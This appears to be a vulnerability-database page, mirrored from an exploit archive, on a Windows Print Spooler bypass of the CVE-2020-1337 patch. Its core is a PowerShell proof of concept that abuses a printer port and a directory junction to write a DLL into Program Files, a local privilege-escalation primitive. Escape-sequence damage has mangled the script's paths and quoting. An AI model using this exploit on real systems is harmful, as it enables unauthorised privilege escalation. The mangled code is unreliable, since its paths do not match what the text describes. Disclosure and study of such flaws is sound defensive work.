Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows Local Spooler Bypass Vulnerability

🗓️ 12 Nov 2020 00:00:00Reported by James ForshawType 
zdt
 zdt🔗 0day.today👁 61 Views

Windows Local Spooler Bypass Vulnerability on Windows 10 200

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Microsoft
12 Aug 202010:05
githubexploit
GithubExploit		Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Microsoft
11 Aug 202012:22
githubexploit
GithubExploit		Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Microsoft
21 Jul 202008:01
githubexploit
GithubExploit		Exploit for Time-of-check Time-of-use (TOCTOU) Race Condition in Microsoft
11 Aug 202014:34
githubexploit
0day.today		Microsoft Spooler Local Privilege Elevation Exploit
18 Jan 202100:00
zdt
ATTACKERKB		CVE-2020-1048: Windows Print Spooler Elevation of Privilege Vulnerability
21 May 202000:00
attackerkb
ATTACKERKB		CVE-2020-1337
17 Aug 202000:00
attackerkb
Information Security Automation		Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020
11 Jan 202101:50
avleonov
Information Security Automation		Microsoft Patch Tuesday August 2020: vulnerabilities with Detected Exploitation, useful for phishing and others
30 Aug 202022:13
avleonov
BDU FSTEC		The vulnerability of the Windows operating system’s print queue dispatcher service allows a hacker to escalate their privileges.
26 Aug 202000:00
bdu_fstec
Rows per page
Windows: Local Spooler CVE-2020-1337 Bypass

One way of exploiting this on Windows 10 2004 is to understand that FileNormalizedNameInformation will fail if the new path after the mount point is not under the root directory of the server. For example the admin$ share points to c:\\windows. If you set the mount point to write to c:\\Program Files then the normalization process will fail and the original string returned. This allows you to write to anywhere outside the windows directory by placing a mount point somewhere like system32\  asks. For example the following script will write the DLL to the root of Program Files.

mkdir \"C:\\windows\\system32\  asks\  est\"
Add-PrinterDriver -Name \"Generic / Text Only\" 
Add-PrinterPort -Name \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\" 
Add-Printer -Name \"PrinterExploit\" -DriverName \"Generic / Text Only\" -PortName \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\"
rmdir \"C:\\windows\\system32\  asks\  est\"
New-Item -ItemType Junction -Path \"C:\\windows\\system32\  asks\  est\" -Value \"C:\\Program Files\"
\"TESTTEST\" | Out-Printer -Name \"PrinterExploit\"


Related CVE Numbers: CVE-2020-1337,CVE-2020-17001,CVE-2020-1337.



Found by: [email protected]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Nov 2020 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 3.17.8
CVSS 27.2
EPSS0.55313
SSVC
microsoft windowsspooler bypassvulnerabilityexploitfilenormalizednameinformationcve-2020-1337cve-2020-1700mount pointadd-printerdriveradd-printerportadd-printerjunctionout-printer
61